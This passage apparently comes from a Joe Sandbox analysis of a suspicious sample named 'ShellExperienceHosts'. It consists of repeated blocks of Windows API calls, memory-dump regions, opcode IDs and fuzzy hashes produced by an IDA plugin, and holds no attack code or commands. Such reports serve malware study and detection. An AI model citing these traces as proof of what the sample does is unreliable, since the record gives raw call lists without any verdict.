                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: MessageParentRectSendWindow$ClientEmptyRedraw
                                                                            • String ID:
                                                                            • API String ID: 1906000866-0
                                                                            • Opcode ID: 174f064a422b96dc75eb60ece2586a961d9b66b1ce0b68ac95919d68d4ee6bb8
                                                                            • Instruction ID: a6f5d1ff6bddcf65e5f648a1d09a71e45f09df0195df29828cae0aa5455c551a
                                                                            • Opcode Fuzzy Hash: 174f064a422b96dc75eb60ece2586a961d9b66b1ce0b68ac95919d68d4ee6bb8
                                                                            • Instruction Fuzzy Hash: 1BA19374B012159FDF059F25C458BAD7BB6BF89348F2401AAE826E7390DB30A902CF94
                                                                            APIs
                                                                            • GetWindowRect.USER32(?,?), ref: 6C6E8AA4
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: RectWindow
                                                                            • String ID:
                                                                            • API String ID: 861336768-0
                                                                            • Opcode ID: 6d3c6f0c715076dd25eeecb9ba32e115cf1502329035896aea13c2b7c5664cb2
                                                                            • Instruction ID: 99106331aa95d6b9422d3132a7a9e2f56b2a49b146114186687f3c2ae10464b2
                                                                            • Opcode Fuzzy Hash: 6d3c6f0c715076dd25eeecb9ba32e115cf1502329035896aea13c2b7c5664cb2
                                                                            • Instruction Fuzzy Hash: D3818D74B01215AFCF059F68C898ABEBBB5BF8D348F14016AE916A7390DB346D01CF95
                                                                            APIs
                                                                              • Part of subcall function 6C7708FD: GetWindowLongW.USER32(?,000000F0), ref: 6C77090A
                                                                            • GetWindowRect.USER32(?,?), ref: 6C7CED2E
                                                                            • GetSystemMetrics.USER32(00000021), ref: 6C7CED36
                                                                            • GetSystemMetrics.USER32(00000020), ref: 6C7CED40
                                                                            • GetKeyState.USER32(00000002), ref: 6C7CED64
                                                                            • InflateRect.USER32(?,?,00000000), ref: 6C7CED9D
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: MetricsRectSystemWindow$InflateLongState
                                                                            • String ID:
                                                                            • API String ID: 2406722796-0
                                                                            • Opcode ID: 2778e01d63a2854de4fc1812a6a843123a0b561c6d7cad8a7d53a5531c3af3f2
                                                                            • Instruction ID: 3264ba7c3f8c0c51a2e2e12985643e2dd7bd9efe49268796c1f913736ecedf0c
                                                                            • Opcode Fuzzy Hash: 2778e01d63a2854de4fc1812a6a843123a0b561c6d7cad8a7d53a5531c3af3f2
                                                                            • Instruction Fuzzy Hash: 7B319232B4021E9FEB109AB8CA5BBBE77B4EF45794F204535E511EB580DA70D980C7D1
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: ClientCursorScreen$Rect
                                                                            • String ID:
                                                                            • API String ID: 1082406499-0
                                                                            • Opcode ID: 0f3f079ac4125ed543177f6368eb95e9d637e6fc9db9f14f848c1205f88d7370
                                                                            • Instruction ID: 7b4da1d073a44002b46378fdcd1f71b0343c04aa73f3940279a162b073152064
                                                                            • Opcode Fuzzy Hash: 0f3f079ac4125ed543177f6368eb95e9d637e6fc9db9f14f848c1205f88d7370
                                                                            • Instruction Fuzzy Hash: F6314971E0020AAFCF15DFA4C984AEEB7B5BF49208F10023AD516A3640DB3AAD45CB91
                                                                            APIs
                                                                            • SendMessageW.USER32(?,00001014,?,00000000), ref: 6C714EFC
                                                                            • SendMessageW.USER32(?,00000114,?,00000000), ref: 6C714F10
                                                                            • SetScrollPos.USER32(?,00000002,00000000,00000001), ref: 6C714F31
                                                                            • GetParent.USER32(?), ref: 6C714F41
                                                                            • SendMessageW.USER32(?,?,00000000,00000000), ref: 6C714F59
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$ParentScroll
                                                                            • String ID:
                                                                            • API String ID: 375824706-0
                                                                            • Opcode ID: 846578a62cbc8f95ce97130a474470bff39e4e7d88ee06ca59a27df7ca6ce901
                                                                            • Instruction ID: 2c122244c9e2b4ed8992704d835935624fdec0a3a537552e857411fc4c19d315
                                                                            • Opcode Fuzzy Hash: 846578a62cbc8f95ce97130a474470bff39e4e7d88ee06ca59a27df7ca6ce901
                                                                            • Instruction Fuzzy Hash: 6C31B070304205BFDF1A8F20CA89FAA777AFB4835DF084229F5265BAA0D7719855DB90
                                                                            APIs
                                                                            • FindResourceW.KERNEL32(?,?,00000006,00000000,?,?,?,?,6C6B201F,00000000,?,?), ref: 6C6B4DF4
                                                                            • LoadResource.KERNEL32(?,00000000,?,6C6B201F,00000000,?,?), ref: 6C6B4E08
                                                                            • LockResource.KERNEL32(00000000,?,6C6B201F,00000000,?,?), ref: 6C6B4E1A
                                                                            • SizeofResource.KERNEL32(?,00000000,?,6C6B201F,00000000,?,?), ref: 6C6B4E28
                                                                            • SysAllocStringLen.OLEAUT32(?,?), ref: 6C700D14
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Resource$AllocFindLoadLockSizeofString
                                                                            • String ID:
                                                                            • API String ID: 913082835-0
                                                                            • Opcode ID: 08c98b044d3d4bc85c0401bf8095f00231cd35a4e87cdfd6089767d9914b5292
                                                                            • Instruction ID: 04a7e08634817465fdcfc3aec4dbd9ce99fd1d5c055e4a7b7966f7dd1dacb1b7
                                                                            • Opcode Fuzzy Hash: 08c98b044d3d4bc85c0401bf8095f00231cd35a4e87cdfd6089767d9914b5292
                                                                            • Instruction Fuzzy Hash: B121F3316012246BDB204F258C88A3B37ACEF46759B118429FC10EB290E7B5D827C7A9
                                                                            APIs
                                                                            • GetClientRect.USER32(?,?), ref: 6C714D96
                                                                            • MapWindowPoints.USER32(?,?,?,00000002), ref: 6C714DA8
                                                                            • PtInRect.USER32(?,?,?), ref: 6C714DB8
                                                                            • MapWindowPoints.USER32(?,?,?,00000001), ref: 6C714DF3
                                                                            • SendMessageW.USER32(?,00000203,?,?), ref: 6C714E12
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: PointsRectWindow$ClientMessageSend
                                                                            • String ID:
                                                                            • API String ID: 3885650166-0
                                                                            • Opcode ID: c8617eb355138279fd4a25a7ddf61dd2c3b1ba77a3d2a2766a7410470f32b4d6
                                                                            • Instruction ID: 62624f9e32b2de5057c4dc00a7379179958444fe3f7b66a548baa7c3c86daade
                                                                            • Opcode Fuzzy Hash: c8617eb355138279fd4a25a7ddf61dd2c3b1ba77a3d2a2766a7410470f32b4d6
                                                                            • Instruction Fuzzy Hash: FF216F31A00209EBCF158F64C958DBEBBB9FF49309B144129F94697650EB31EE14DB90
                                                                            APIs
                                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 0223404B
                                                                              • Part of subcall function 022313F7: HeapFree.KERNEL32(?,00000000,?,?,?,02234088,?,00000000,02234010,?,10015054,0223361F), ref: 02231414
                                                                            • HeapDestroy.KERNEL32(?,?,00000000,02234010,?,10015054,0223361F), ref: 02234090
                                                                            • HeapCreate.KERNEL32(?,?,?,?,00000000,02234010,?,10015054,0223361F), ref: 022340AB
                                                                            • SetEvent.KERNEL32(?,?,00000000,02234010,?,10015054,0223361F), ref: 02234127
                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 0223412E
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3542377885.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_2230000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Heap$CriticalSection$CreateDestroyEnterEventFreeLeave
                                                                            • String ID:
                                                                            • API String ID: 563679510-0
                                                                            • Opcode ID: a47338e344b9415d0666abf4aacaa3da54f4cea86e3874ea6b078b9e747c069c
                                                                            • Instruction ID: 224cf53adfd892736bb4913e24e85abb70d922bd8a0aea5c54fd972bfee8ad22
                                                                            • Opcode Fuzzy Hash: a47338e344b9415d0666abf4aacaa3da54f4cea86e3874ea6b078b9e747c069c
                                                                            • Instruction Fuzzy Hash: DF315CB0610A02EFD70ADBB4C888B95F7A5FF48315F148249E4298B660CB35F855CFD0
                                                                            APIs
                                                                              • Part of subcall function 6C6E2BB1: __EH_prolog3.LIBCMT ref: 6C6E2BB8
                                                                              • Part of subcall function 6C6E2BB1: GetDC.USER32(00000000), ref: 6C6E2BE4
                                                                            • IsRectEmpty.USER32(?), ref: 6C70CB00
                                                                            • InvertRect.USER32(?,?), ref: 6C70CB0E
                                                                            • SetRectEmpty.USER32(?), ref: 6C70CB1E
                                                                            • GetClientRect.USER32(?,?), ref: 6C70CB35
                                                                            • InvertRect.USER32(?,?), ref: 6C70CB80
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$EmptyInvert$ClientH_prolog3
                                                                            • String ID:
                                                                            • API String ID: 1656078942-0
                                                                            • Opcode ID: d987a7ed954987d0e646d149c30e9950e3499e001ea59721c89203cf4c70cfa1
                                                                            • Instruction ID: 55fc513f71256ebf2a659bb9c52f1e61227aa07eb3a9126cc99a1d0b9fa769e9
                                                                            • Opcode Fuzzy Hash: d987a7ed954987d0e646d149c30e9950e3499e001ea59721c89203cf4c70cfa1
                                                                            • Instruction Fuzzy Hash: D0212CB1A006099FCB15DF78C9849EEBBF9FF09319F14412DE406A7600DB31AE85CBA4
                                                                            APIs
                                                                            • _malloc.LIBCMT ref: 1000E5E5
                                                                              • Part of subcall function 10006E83: __FF_MSGBANNER.LIBCMT ref: 10006E9C
                                                                              • Part of subcall function 10006E83: __NMSG_WRITE.LIBCMT ref: 10006EA3
                                                                              • Part of subcall function 10006E83: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F), ref: 10006EC8
                                                                            • _free.LIBCMT ref: 1000E5F8
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: AllocateHeap_free_malloc
                                                                            • String ID:
                                                                            • API String ID: 1020059152-0
                                                                            • Opcode ID: 073510cd7888ec162256f41c4b27844541b3ac2ad2a228e050a5b5aba56439fd
                                                                            • Instruction ID: 99b6cfc0e9903126c7bed8e87128f69c37c5ff73db012c927cbf40cb5b0e6f66
                                                                            • Opcode Fuzzy Hash: 073510cd7888ec162256f41c4b27844541b3ac2ad2a228e050a5b5aba56439fd
                                                                            • Instruction Fuzzy Hash: 2F113A36900A61ABFB229BB4BC0564E37D5FF443F1B214525F848BB198DF36DD404B94
                                                                            APIs
                                                                            • __EH_prolog3.LIBCMT ref: 6C7A8851
                                                                            • SendMessageW.USER32(00000000,0000007F,00000000,00000000), ref: 6C7A8874
                                                                            • SendMessageW.USER32(00000000,0000007F,00000001,00000000), ref: 6C7A8888
                                                                            • GetClassLongW.USER32(00000000,000000DE), ref: 6C7A88E5
                                                                            • GetClassLongW.USER32(00000000,000000F2), ref: 6C7A88F6
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: ClassLongMessageSend$H_prolog3
                                                                            • String ID:
                                                                            • API String ID: 350087385-0
                                                                            • Opcode ID: 49f138f203dde7901fad8a92edce201d016a5eb6f646ee009203d348d2ae4846
                                                                            • Instruction ID: fa86b9c5845d3ac592f6cb9c888eb556f6f47142675469b9de74155cabfe0226
                                                                            • Opcode Fuzzy Hash: 49f138f203dde7901fad8a92edce201d016a5eb6f646ee009203d348d2ae4846
                                                                            • Instruction Fuzzy Hash: 5811E432A1522ABBDB225AA0CE45FAE7635BF1576CF100331F45076AE0DB60DC008694
                                                                            APIs
                                                                            • __EH_prolog3_GS.LIBCMT ref: 6C71EB6D
                                                                            • GetWindowRect.USER32(00000000,00000000), ref: 6C71EBB6
                                                                            • CreateRoundRectRgn.GDI32(00000000,00000000,00000001,?,00000004,00000004), ref: 6C71EBE0
                                                                            • SetWindowRgn.USER32(00000000,?,00000000), ref: 6C71EBF6
                                                                            • SetWindowRgn.USER32(00000000,00000000,00000000), ref: 6C71EC0E
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Rect$CreateH_prolog3_Round
                                                                            • String ID:
                                                                            • API String ID: 2502471913-0
                                                                            • Opcode ID: 08b0775f44596085cdad784c82885e6453b9e0ec2f132c013dd1d41af9664106
                                                                            • Instruction ID: 5f76dbfd149fdb802652514307520c3ddfd93c3ee06ac5a28bdffa2d8cd5daae
                                                                            • Opcode Fuzzy Hash: 08b0775f44596085cdad784c82885e6453b9e0ec2f132c013dd1d41af9664106
                                                                            • Instruction Fuzzy Hash: 8B113D75A00519EFDF15CFA4CE88AEDBB78FF09208F140229E501B3A50DB31AD55CBA5
                                                                            APIs
                                                                            • __EH_prolog3_GS.LIBCMT ref: 6C708451
                                                                            • IsWindow.USER32(?), ref: 6C708478
                                                                            • InflateRect.USER32(?,00000000,000000FF), ref: 6C708494
                                                                            • InvalidateRect.USER32(?,?,00000001), ref: 6C7084A9
                                                                            • UpdateWindow.USER32(?), ref: 6C7084B8
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: RectWindow$H_prolog3_InflateInvalidateUpdate
                                                                            • String ID:
                                                                            • API String ID: 2146894351-0
                                                                            • Opcode ID: 36b2405668493ea3a48cd7bd62d5d083e67f567e9821a83ee3b6354b8a262d52
                                                                            • Instruction ID: ebb2b80c891d376d7395123ed57953d251efc50b4756b44fa8578043ab8c2ec3
                                                                            • Opcode Fuzzy Hash: 36b2405668493ea3a48cd7bd62d5d083e67f567e9821a83ee3b6354b8a262d52
                                                                            • Instruction Fuzzy Hash: 1F11F9717002159FDF15DFA4CA98F9937B5BF49308F1401A8E919AF2A1DB31E909CB60
                                                                            APIs
                                                                            • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 10002BFF
                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 10002C15
                                                                            • TranslateMessage.USER32(?), ref: 10002C24
                                                                            • DispatchMessageW.USER32(?), ref: 10002C2A
                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 10002C38
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Message$Peek$DispatchMultipleObjectsTranslateWait
                                                                            • String ID:
                                                                            • API String ID: 2015114452-0
                                                                            • Opcode ID: dbe9700d19ae9a12251f89c422866142aee7b4545ced7af6ef9db51ab6727882
                                                                            • Instruction ID: 0e3c485fe407bbf507bfa30b8d40781191f7ce2fd7dbe990fe93c7e11cc8c17a
                                                                            • Opcode Fuzzy Hash: dbe9700d19ae9a12251f89c422866142aee7b4545ced7af6ef9db51ab6727882
                                                                            • Instruction Fuzzy Hash: 8901A972A80319F6F610EB948D91FAE736CEB04B91F504511FF04EE0D9DAB1E80587B4
                                                                            APIs
                                                                            • __CreateFrameInfo.LIBCMT ref: 022436A2
                                                                              • Part of subcall function 02243232: __getptd.LIBCMT ref: 02243240
                                                                              • Part of subcall function 02243232: __getptd.LIBCMT ref: 0224324E
                                                                            • __getptd.LIBCMT ref: 022436AC
                                                                              • Part of subcall function 022398E6: __getptd_noexit.LIBCMT ref: 022398E9
                                                                              • Part of subcall function 022398E6: __amsg_exit.LIBCMT ref: 022398F6
                                                                            • __getptd.LIBCMT ref: 022436BA
                                                                            • __getptd.LIBCMT ref: 022436C8
                                                                            • __getptd.LIBCMT ref: 022436D3
                                                                              • Part of subcall function 022432D7: __CallSettingFrame@12.LIBCMT ref: 02243323
                                                                              • Part of subcall function 022437A0: __getptd.LIBCMT ref: 022437AF
                                                                              • Part of subcall function 022437A0: __getptd.LIBCMT ref: 022437BD
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3542377885.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_2230000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: __getptd$CallCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                            • String ID:
                                                                            • API String ID: 3282538202-0
                                                                            • Opcode ID: 2f8cf262afac08e33e01d992e0837c391acebccb040fbf70ddcfda8d5a1f53bb
                                                                            • Instruction ID: ea274e39d583fa523b6501a8518a0dc9f6ba60b314e7c4157d6f4fcbd0b06614
                                                                            • Opcode Fuzzy Hash: 2f8cf262afac08e33e01d992e0837c391acebccb040fbf70ddcfda8d5a1f53bb
                                                                            • Instruction Fuzzy Hash: 9B11E2B1C103099FDB01EFE4C945AAE7BB1FF48310F1084AAE814AB254EB789A549F50
